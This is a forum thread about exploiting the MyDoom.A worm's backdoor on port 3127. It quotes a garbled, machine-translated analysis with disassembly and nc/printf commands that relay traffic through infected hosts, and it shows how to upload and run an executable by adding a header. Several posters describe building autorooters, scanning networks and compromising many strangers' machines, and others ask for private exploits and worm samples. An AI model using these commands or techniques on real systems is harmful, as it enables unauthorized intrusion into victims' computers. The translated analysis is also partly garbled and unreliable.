Quote:

Remote Access Component
The worm (this functionality is in the dropped DLL) opens a connection on TCP port 3127 (if that fails it opens next available port up to port 3198). The worm can accept specially crafted TCP transmissions.

On receipt of one kind of such a transmission it will save the embedded binary into a temporary file and execute it. Then the temporary file is deleted.
On receipt of another kind it can relay TCP packets thus providing IP spoofing capabilities (possibly to facilitate SPAM distribution)

/quote

As far as i could find, it acts as a socks4 without pass, but this is quite useless.
As for the The worm can accept specially crafted TCP transmissions. ... On receipt of one kind of such a transmission it will save the embedded binary into a temporary file and execute it does anyone know anything else about this ?

its a little off topic but i dont want to open a new thread on this subject,
just to say that eeye have released a scanner for the mydoom worm

http://www.eeye.com/html/Research/Tools/MyDoom.html

I was going to start thread about this yersterday but with my 'trail' thingy going on...

Anyway - seems like yet another wormie that uses good ol' vulnerabilities and spreads with crappy email clients.

I have a dream. Someday, may be, just may be, everybody will upgrade to (filtered) new versions and there wouldn't be millions of computers compromised because they're too damn stupid to buy new hardware and software to match that.

Does any one know what the worm is coded in...

Having a SOCKS4 server is hardly useless! While not quite as nice as having a shell bound, you can act as a trusted machine in a network environment making this worm much more hurtful to business environments.

Plus, this worm doesn't spread itself through vulns, its just an email attachment worm, so its the dumb people who open it (IE ITS NOT BLASTER).

Update

i wrote an uploader when i read this earlier today, it's really easy guys... the hard part is finding any of these. this is a bullsh1t worm. i scanned several class b and there were only a few infected (i just did this to test my uploader).

New tool for hack mydoom at port 3127 executing and upload an .exe file

yeah ,that would be cool

clubfed: why don't you just ask ppl for their email headers, or look thru ur bulk folder in a free email account and look at the headers, the worm sends right from a victims computer right? So their IP is right there, you can then scan more efficiently...

-niko

yea it says that "This file contains Unix Characters and must be opened directly" or something similar and pple click and virus activated..

ok the ultimate fix for exploits. sence there is so many dumb asses that dont patch there systems why doesnt big companys like microsoft write worms that spread threw the exploit and patch the systems.

hdlgp and clubfed, could you guys share your code with the rest of us so we could try them ?

I have read about a private exploit. Does it really exist?

i hear its real but i havent seen the exploit anywhere

yeah i heared about the exploit too

Yeah, exploit exists...the one i know of is named sl.exe and is run with following parraments from a scanstro

site exec sl -bhpt 3127 -f inputfile.txt -o outputfile.txt

yeah there are a few private exploits on the loose, it's in fact pretty simple to make, and there are a lot of servers infected

For people who have coding expirience, it mighty be easy *fg*. Let's wait till a privat exploit is public

nop sorry I haven't got the source, and when I would have it, I would give it out when it's not private anymore so just wait...
btw most EU UNI servers are allready exploited and secured

The Mydoom.a back door is by the dll form existence, through the revision registration table corresponding key value, increase own to the resource management advancement space in.

In the normal condition, the registration table should be this appearance:
HKEY_CLASSES_ROOTCLSID {E6FB5E20-DE35-11CF-9C87-00AA005127ED} InProcServer32
<NO NAME> REG_EXPAND_SZ %SystemRoot%System32webcheck.dll
ThreadingModel REG_SZ Apartment

But Mydoom.a this place %SystemRoot%System32webcheck.dll for will change into own shimgapi.dll.

Tacitly approves in the situation, the shimgapi.dll back door monitors 3,127 ports, if this port is taken, then increases progressively, but is not bigger than 3198.

This back door has provided two functions:
1st, retransmits the proxy as the port
2nd, takes the back door, in the receive procedure passes on and the execution

Related code:
Text:7E1A1C44 sub_7E1A1C44 proc near; DATA XREF: Start+19o
Text:7E1A1C44
Text:7E1A1C44 WSAData = WSAData ptr -190h
Text:7E1A1C44
Text:7E1A1C44 sub esp, 190h
Text:7E1A1C4A push esi
Text:7E1A1C4B push edi
Text:7E1A1C4C call sub_7E1A1A1F
Text:7E1A1C51 lea eax, [ esp+198h+WSAData ]
Text:7E1A1C55 push eax; LpWSAData
Text:7E1A1C56 push 2; WVersionRequested
Text:7E1A1C58 call ds:WSAStartup
Text:7E1A1C5E call Address
Text:7E1A1C63 mov edi, ds:Sleep
Text:7E1A1C69 mov esi, 0C37h; Monitors 3,127 ports
Text:7E1A1C6E
Text:7E1A1C6E loc_7E1A1C6E: ; CODE XREF: Sub_7E1A1C44+50j
Text:7E1A1C6E push 3
Text:7E1A1C70 push esi
Text:7E1A1C71 call sub_7E1A1B52; Bind subroutine
Text:7E1A1C76 pop ecx
Text:7E1A1C77 pop ecx
Text:7E1A1C78 push 400h; DwMilliseconds
Text:7E1A1C7D call edi; Sleep
Text:7E1A1C7F cmp esi, 0C7Eh; The port is not bigger than 3198
Text:7E1A1C85 jle short loc_7E1A1C93
Text:7E1A1C87 push 800h; DwMilliseconds
Text:7E1A1C8C call edi; Sleep
Text:7E1A1C8E mov esi, 0C37h
Text:7E1A1C93
Text:7E1A1C93 loc_7E1A1C93: ; CODE XREF: Sub_7E1A1C44+41j
Text:7E1A1C93 inc esi; If after the port is bigger than 3,198 pieces to reduce 1 again bind
Text:7E1A1C94 jmp short loc_7E1A1C6E
Text:7E1A1C94 sub_7E1A1C44 endp

After 3,127 ports receive the connection, if the recv first character is x04, changes over to the port to retransmit flow --> to judge the second character whether is 0x01 --> takes the 5~8 four characters to take 3, 42 characters as goal IP address --> carries on the connection as goal port --> and retransmits with the current socket data

For example, we to x00x6exc0xa8x01x0b took the bridging order, among, x00x6e is 110 ports, xc0xa8x01x0b is 192.168.1.11.

# printf x04x01x00x6exc0xa8x01x0bx00 | nc 192.168.7.333127
Z includes
+OK Microsoft Exchange Server 2,003 POP3 server version 6.5.6944.0 ready.

May see, sent out 192.168.1.11 110 ports the conversations to return. Please note in front of the character which returned has also contained section of data. Again makes the test:

# printf x04x01x00x6exc0xa8x01x0bx00 | nc 192.168.7.333127 | xxd -g 1
0000000: 04 5a 00 6e c0 a8 01 0b 2b 4f 4b 20 4d 696,372 Z.n.... +OK Micr
0000010: 6f 73 6f 6674204578636861 6e 67.652053 million osoft Exchange S
0000020: 657276657220323030332050 4f 503,320 erver 2,003 POP3
0000030: 736572766572207665727369 6f 6e 2,036 server version 6
0000040: 2E 35 2e 36.393434 million 2e 3.020286463 billion 2e 69 6e 5.6944.0

The attempt transmission instruction connection does not exist 98 ports:
# printf x04x01x00x62xc0xa8x01x0bx00 | nc 192.168.7.333127 | xxd -g 1
0000000: 04 5b 0,062 c0 a8 01 0b. [ b....

Very obviously, that section of data express the connection condition. 04 5a expression connects successfully, 04 5b expression connection defeat. Behind was transmits the past the bridging order. This characteristic possibly is the worm author for facilitate own customer end judgement to design.

Related code:
Text:7E1A17F5
Text:7E1A17F5 loc_7E1A17F5: ; CODE XREF: Sub_7E1A17BA+2Bj
Text:7E1A17F5 cmp byte ptr [ ebp-1 ], 4; Compared with the first character is not 0x04
Text:7E1A17F9 push ebx
Text:7E1A17FA jnz loc_7E1A18B7; The first character is not 0x04 changes over to the withdrawal
Text:7E1A1800 xor ebx, ebx
Text:7E1A1802
Text:7E1A1802 loc_7E1A1802: ; CODE XREF: Sub_7E1A17BA+65j
Text:7E1A1802 push 0; Flags
Text:7E1A1804 push 8
Text:7E1A1806 pop eax
Text:7E1A1807 sub eax, ebx
Text:7E1A1809 push eax; Len
Text:7E1A180A lea eax, [ ebp+ebx+buf ]
Text:7E1A180E push eax; Buf
Text:7E1A180F push [ ebp+s ]; S
Text:7E1A1812 call esi; Recv
Text:7E1A1814 test eax, eax
Text:7E1A1816 jl short loc_7E1A1823
Text:7E1A1818 jz short loc_7E1A1825
Text:7E1A181A add ebx, eax
Text:7E1A181C cmp ebx, 8; Compared with the character which receives suffices insufficient 8
Text:7E1A181F jl short loc_7E1A1802; Accepts the character number insufficiently continues recv
Text:7E1A1821 jmp short loc_7E1A1825
Text:7E1A1823; Which which which which which which which which which which which which which which which which which which which which which which which which which which which which which which which which which which which which which?
Text:7E1A1823
Text:7E1A1823 loc_7E1A1823: ; CODE XREF: Sub_7E1A17BA+5Cj
Text:7E1A1823 mov ebx, eax
Text:7E1A1825
Text:7E1A1825 loc_7E1A1825: ; CODE XREF: Sub_7E1A17BA+5Ej
Text:7E1A1825; Sub_7E1A17BA+67j
Text:7E1A1825 cmp ebx, 8
Text:7E1A1828 jnz loc_7E1A1907
Text:7E1A182E jmp short loc_7E1A1836
Text:7E1A1830; Which which which which which which which which which which which which which which which which which which which which which which which which which which which which which which which which which which which which which?
Text:7E1A1830
Text:7E1A1830 loc_7E1A1830: ; CODE XREF: Sub_7E1A17BA+8Cj
Text:7E1A1830 cmp [ ebp+var_2 ], 0; After 8 characters characters whether are 0x00, in other words has transmitted whether only 8 characters
Text:7E1A1834 jz short loc_7E1A184A
Text:7E1A1836
Text:7E1A1836 loc_7E1A1836: ; CODE XREF: Sub_7E1A17BA+74j
Text:7E1A1836 push 0
Text:7E1A1838 lea eax, [ ebp+var_2 ]
Text:7E1A183B push 1
Text:7E1A183D push eax
Text:7E1A183E push [ ebp+s ]
Text:7E1A1841 call esi
Text:7E1A1843 cmp eax, 1
Text:7E1A1846 jz short loc_7E1A1830
Text:7E1A1848 jmp short loc_7E1A18B7
Text:7E1A184A; Which which which which which which which which which which which which which which which which which which which which which which which which which which which which which which which which which which which which which?
Text:7E1A184A
Text:7E1A184A loc_7E1A184A: ; CODE XREF: Sub_7E1A17BA+7Aj
Text:7E1A184A cmp [ ebp+buf ], 4; Judges the first character once more whether is 0x04
Text:7E1A184E jnz short loc_7E1A18B7
Text:7E1A1850 cmp byte ptr [ ebp-0Fh ], 1; Judges the second character whether is 0x01, if is, then continues, is not, then withdraws
Text:7E1A1854 jnz short loc_7E1A18B7
Text:7E1A1856 cmp [ ebp+hostlong ], 0; At the end of judgement four characters (IP) whether entire 0
Text:7E1A185A jz short loc_7E1A187C
Text:7E1A185C push [ ebp+hostlong ]; Hostlong
Text:7E1A185F call ds:htonl
Text:7E1A1865 test eax, 0FFFFFF00h; Whether inspection input IP is 255.255.255.0
Text:7E1A186A jnz short loc_7E1A187C
Text:7E1A186C push [ ebp+s ]
Text:7E1A186F lea ebx, [ ebp+hostlong ]
Text:7E1A1872 call sub_7E1A1664
Text:7E1A1877 test eax, eax
Text:7E1A1879 pop ecx
Text:7E1A187A jnz short loc_7E1A18B7
Text:7E1A187C
Text:7E1A187C loc_7E1A187C: ; CODE XREF: Sub_7E1A17BA+A0j
Text:7E1A187C; Sub_7E1A17BA+B0j
Text:7E1A187C mov ax, [ ebp-0Eh ]; Takes the first two characters, takes the port
Text:7E1A1880 push 6; Protocol
Text:7E1A1882 mov word ptr [ ebp+name.sa_data ], ax
Text:7E1A1886 mov eax, [ ebp+hostlong ]
Text:7E1A1889 push 1; Type
Text:7E1A188B push 2; Af
Text:7E1A188D mov [ ebp+name.sa_family ], 2
Text:7E1A1893 mov dword ptr [ ebp+name.sa_data+2 ], eax
Text:7E1A1896 call ds:socket
Text:7E1A189C cmp eax, 0FFFFFFFFh
Text:7E1A189F mov [ ebp+var_8 ], eax
Text:7E1A18A2 jz short loc_7E1A18B7
Text:7E1A18A4 lea eax, [ ebp+name ]
Text:7E1A18A7 push 10h; Namelen
Text:7E1A18A9 push eax; Name
Text:7E1A18AA push [ ebp+var_8 ]; S
Text:7E1A18AD call ds:connect
Text:7E1A18B3 test eax, eax
Text:7E1A18B5 jz short loc_7E1A18D2
Text:7E1A18B7
Text:7E1A18B7 loc_7E1A18B7: ; CODE XREF: Sub_7E1A17BA+40j
Text:7E1A18B7; Sub_7E1A17BA+8Ej...
Text:7E1A18B7 push 0; Flags
Text:7E1A18B9 lea eax, [ ebp+buf ]
Text:7E1A18BC push 8; Len
Text:7E1A18BE push eax; Buf
Text:7E1A18BF push [ ebp+s ]; S
Text:7E1A18C2 mov [ ebp+buf ], 4
Text:7E1A18C6 mov byte ptr [ ebp-0Fh ], 5Bh; The connection is not successful, returns to 0x5B
Text:7E1A18CA call ds:send
Text:7E1A18D0 jmp short loc_7E1A18F8
Text:7E1A18D2; Which which which which which which which which which which which which which which which which which which which which which which which which which which which which which which which which which which which which which?
Text:7E1A18D2
Text:7E1A18D2 loc_7E1A18D2: ; CODE XREF: Sub_7E1A17BA+FBj
Text:7E1A18D2 push 0; Flags
Text:7E1A18D4 lea eax, [ ebp+buf ]
Text:7E1A18D7 push 8; Len
Text:7E1A18D9 push eax; Buf
Text:7E1A18DA push [ ebp+s ]; S
Text:7E1A18DD mov [ ebp+buf ], 4
Text:7E1A18E1 mov byte ptr [ ebp-0Fh ], 5Ah; Connects successfully, returns to 0x5A
Text:7E1A18E5 call ds:send
Text:7E1A18EB push [ ebp+var_8 ]
Text:7E1A18EE push [ ebp+s ]
Text:7E1A18F1 call sub_7E1A16D3
Text:7E1A18F6 pop ecx
Text:7E1A18F7 pop ecx


If the recv 1st character is xQQ --> a 2~5 character is xPPxPPxPPxPP --> accepts all data which starts from the sixth character, took the document preservation after temporary folder --> CreateProcess the --> procedure withdrawal, deletes the procedure.

In other words, so long as we wilfully may the execution file forehead, add on five characters: XQQxPPxPPxPPxPP, transmitted as the data to infected the Mydoom.a worm machine 3,127 ports, this document, could carry out on the system. I the system calculator procedure, have added on with UltraEdit this magic-head, transmitted the past with NC, the success carries out.

# xxd -g 1 -l 64 calc.exe
0000000: Qq pp pp pp pp 4d 5a 900003000000040000.. <. MZ.........
0000010: 00 ff ff 0,000 b8 00000000000000400000............. @..
0000020: 00000000000000000000000000000000................
0000030: 00000000000000000000000000000000................

# nc 192.168.7.333127 < calc.exe

do u have the exe file for this or the source ? it looks interesting

I made an autorooter for mydoom one of the first days after it started spreading, it works great for my local vmware machines. However, for some reason I can't seem to find a lot of infected machines on the inet. I scan for 3127, assuming that very few machines already has this port taken, but I can't locate any machines with the port open. Is there really such a huge amount of machines infected out there?

Doesn't this thing stop spreading on the 12th?

The people keeping it private will piss around and wait until after the 12th when its useless then release it to the public. *sigh* greed is a terrible thing...

I'd love to get my hands on that private exploit.

dude, you are seriously stupid, the actual hex bytes needed to authenticate to the dll is ofcourse removed.

no dude you are
look on the first page.. TADAA

i've managemed to "puzzle together" the header with the analysis on the 1st page (posted by Wolfman) and the info on the 2nd page (posted by ch0pper). i added the header to a WinShell .exe and used nc to sent it to the infected host. i connected to the shell and i hacked the box. only succeeded 1 time tho.

heh
hacking them by dozens now
lotsa fast ones too :]

terrortbd : that first advisory does have the bytes, that is correct. However that is not what I said, I said that you were stupid to not understand that QQ and pp were those bytes, only censored. Oh, and I found the error in my autorooter, stupid typo, now it works quite nicely.
Oh, and there is almost no point in scanning for port 3128++, since almost no machines already have 3127 taken, and mydoom thus spawns the dll backdoor on port 3127.

Yep guys anyone with base knowledge of Hex can put this together, just take the first advisory and the second, use common sense, blam it works.

hi!

Can anyone send me doomjoice.b (or any mydoom except for mydoom.a)? I'm not good in asm, but it's just 5000 byte. So i wanna take a look of it disassembled.
Send it zipped with password (with the pass in the mail), 'cause the virus own would be filtered by my mail server.

Thx:
cye
(cziber@ludens.elte.hu)

^^
Didnt I just see this in a different post